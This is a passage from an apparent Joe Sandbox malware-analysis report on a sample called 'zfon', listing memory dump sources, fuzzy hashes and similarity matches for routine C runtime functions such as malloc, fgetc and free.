                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2803490479-0
                                                                                                • Opcode ID: 8492ec3cbb052648847725c6eac285aad335bf2eec9658cc8bf6bb9f2bd8324d
                                                                                                • Instruction ID: c3b6bc6b942329e7e66e0b22e11f8a1c630256c60339c651ed5f48cbf1b21cdc
                                                                                                • Opcode Fuzzy Hash: 8492ec3cbb052648847725c6eac285aad335bf2eec9658cc8bf6bb9f2bd8324d
                                                                                                • Instruction Fuzzy Hash: E8C17973B05B4482EF10DF69E8402ADA7B2FB44B98B598531CE6D17BA8EF38D415C390
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: fgetc
                                                                                                • String ID:
                                                                                                • API String ID: 2807381905-0
                                                                                                • Opcode ID: 37ef44d73613fa637cd5931db9e282469f942bc8d6bbf53949da0148d4e9ee1e
                                                                                                • Instruction ID: 01c97e0e0555639cb9da6743b05e7ee202484f08df455ced0418e7a8bdc9e652
                                                                                                • Opcode Fuzzy Hash: 37ef44d73613fa637cd5931db9e282469f942bc8d6bbf53949da0148d4e9ee1e
                                                                                                • Instruction Fuzzy Hash: A5812B76A09E85D8EB508F2DC4903AC37A6FB48B98F615632EB6E47798DF38D445C310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$NameName::
                                                                                                • String ID:
                                                                                                • API String ID: 168861036-0
                                                                                                • Opcode ID: 2525277bc558616bb67a30a3331fd7d08be3bd4bec0defa2e2d618cc86f76eb6
                                                                                                • Instruction ID: 640f444b360ec36bff0865eceecefdeb80275dccdd48c1e117f27201c173175c
                                                                                                • Opcode Fuzzy Hash: 2525277bc558616bb67a30a3331fd7d08be3bd4bec0defa2e2d618cc86f76eb6
                                                                                                • Instruction Fuzzy Hash: 2C717772A18B5699F7018FA8E8A02BC77A5BB54788F688036EB0D67695DF7CE445C300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2704743706-0
                                                                                                • Opcode ID: fbe8a88868b665d4309cbe054d2a8286b12580c86b6c0d59b7eba0ca7af31215
                                                                                                • Instruction ID: 5276b24712310e16a0ad2dda169bec5cb5ba48116066419e2911aec4bab22ab6
                                                                                                • Opcode Fuzzy Hash: fbe8a88868b665d4309cbe054d2a8286b12580c86b6c0d59b7eba0ca7af31215
                                                                                                • Instruction Fuzzy Hash: 1A418E26F08E829AFB119F6DA4422F973A2AF887C4F554631DB2D27295DF3CE5478240
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2704743706-0
                                                                                                • Opcode ID: 45cdee77e7545dfb4ac0ef30fcf84e3151481f7f1e52e181642e42e439e35c8f
                                                                                                • Instruction ID: 208d11101057219173e05044181de810e9668cf15f5aea76318a07888faa11d1
                                                                                                • Opcode Fuzzy Hash: 45cdee77e7545dfb4ac0ef30fcf84e3151481f7f1e52e181642e42e439e35c8f
                                                                                                • Instruction Fuzzy Hash: C9416B22F08E829AFB129F6EA4412B933A1AF847C4F914235DB2D27395DF3CE5479200
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2704743706-0
                                                                                                • Opcode ID: 46f50b73c82e49e8af2879a4f3962c67271bb0fc27e978c102ab5c68021049db
                                                                                                • Instruction ID: 5652a125e5a897f2394562a07f70fcca2038b4e1b940840f826e5697204963c8
                                                                                                • Opcode Fuzzy Hash: 46f50b73c82e49e8af2879a4f3962c67271bb0fc27e978c102ab5c68021049db
                                                                                                • Instruction Fuzzy Hash: 5041B522E0CEC393EA129F2E94415BAAA60BF847C0F545631EB9D27795DF3DE5079600
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 3741236498-0
                                                                                                • Opcode ID: 080442bbed9b7baa97cf181390621352c52238d50ff0bc3b3759bb2dfd2316c3
                                                                                                • Instruction ID: 3d41c7f8ef890fcbe6f4392884ee923d5fe9e224761bb317bf01658cbc3d1ac7
                                                                                                • Opcode Fuzzy Hash: 080442bbed9b7baa97cf181390621352c52238d50ff0bc3b3759bb2dfd2316c3
                                                                                                • Instruction Fuzzy Hash: F631C422B2AB9191FA15DFA9A81456973A1FF48FE0B598535DF2D03380EE3DE856C300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __acrt_iob_funccalloc$Mtx_unlock_beginthreadexabortfputcfputs
                                                                                                • String ID:
                                                                                                • API String ID: 3995598257-0
                                                                                                • Opcode ID: 6ad6c8eed9cc5b4294a11b96ced4649fbf6b7dbd8c716d51d6e433a25b8b480f
                                                                                                • Instruction ID: 271e2713a46f047ee6b786975c5d45ff154cc914726ae55aa7572bf9053a70a0
                                                                                                • Opcode Fuzzy Hash: 6ad6c8eed9cc5b4294a11b96ced4649fbf6b7dbd8c716d51d6e433a25b8b480f
                                                                                                • Instruction Fuzzy Hash: 86214F22A18A9199EB40AF69D8506F93374FF48BD8F041035FB1E47B9ADE38D585C780
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Once$ExecuteInit__crtterminate$ErrorExceptionLastSystem_errorSystem_error::_Throw_invalid_parameter_noinfo_noreturnstd::_
                                                                                                • String ID:
                                                                                                • API String ID: 3077141932-0
                                                                                                • Opcode ID: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                • Instruction ID: cbece2283d21a62c2ce779dcde4f3c00f2e38f8e67f1e1f76814cec13ddff301
                                                                                                • Opcode Fuzzy Hash: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                • Instruction Fuzzy Hash: 4D21E761A1C7D792EB109F2CE8000AA63A0FF997D4F505231EB9D43699EF3CD542D700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow__std_exception_copy$std::invalid_argument::invalid_argument$std::regex_error::regex_error
                                                                                                • String ID:
                                                                                                • API String ID: 2225372811-0
                                                                                                • Opcode ID: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                • Instruction ID: a8a75762125abda393290a639645a6660667a7d19727c9e6faca4ef376340efe
                                                                                                • Opcode Fuzzy Hash: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                • Instruction Fuzzy Hash: C2F01262A184C2A6D910AB18D4650AE6330BB943C4F904172E39E46AA6ED6DD70DDB00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
                                                                                                • String ID:
                                                                                                • API String ID: 490008815-0
                                                                                                • Opcode ID: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                • Instruction ID: bb07ddda5ffd64a2e4097d1792c751823cb22aa218623100952729b7c265e250
                                                                                                • Opcode Fuzzy Hash: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                • Instruction Fuzzy Hash: E121EA26E08B8582E7059F3CD5052B827A0FBA9B98F15A624CF9C16222EF79E5D5D340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                • Instruction ID: 568ca550da720589f3ecaf97bbf2b24a009a57474f64b2119c28780350080ca2
                                                                                                • Opcode Fuzzy Hash: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                • Instruction Fuzzy Hash: A5F04B70F0A60390EF48BF20A949378A1B1AF987B1FC00734C13D016ECEE1D649642B5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                • Instruction ID: 4f831c2bd9fa955e1f7251ee3f0c2cef438251d239dc62178832d6be681d3d52
                                                                                                • Opcode Fuzzy Hash: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                • Instruction Fuzzy Hash: 8EF0FBA0E1670251FF68BB21A94A37991B1EF597F1F804774C53E416DCED1C258646B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                • Instruction ID: beaa5c96107deb05d8c7235e7f234368299ba1700c4cfb909ac985803cd20ffe
                                                                                                • Opcode Fuzzy Hash: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                • Instruction Fuzzy Hash: 9F014460E09B02A2EF58BB62B949338A1B0AF497F1F800635C17D812DCED1C65C98672
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                • Instruction ID: 546d29ddfbabc25d81a19a85dff4b8d3d20190cd900e847e743dc7e5de3829bb
                                                                                                • Opcode Fuzzy Hash: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                • Instruction Fuzzy Hash: 78014F70F1670291EE68BF64AD4A378A1F0DF587F1F840674C53E012ECEE5C648686B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                • Instruction ID: 1a6a1f56af672c94d29b9c6dad127b0a590bf974ca132a8fbed9fe1087550604
                                                                                                • Opcode Fuzzy Hash: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                • Instruction Fuzzy Hash: D401FF70F06B0691EE99FB64AD49268A1F0AF597F1F800635C53D016ECEE5C648682B0
                                                                                                APIs
                                                                                                • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F987F
                                                                                                • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F98A0
                                                                                                • new.LIBCMT ref: 00007FF7F96F98AA
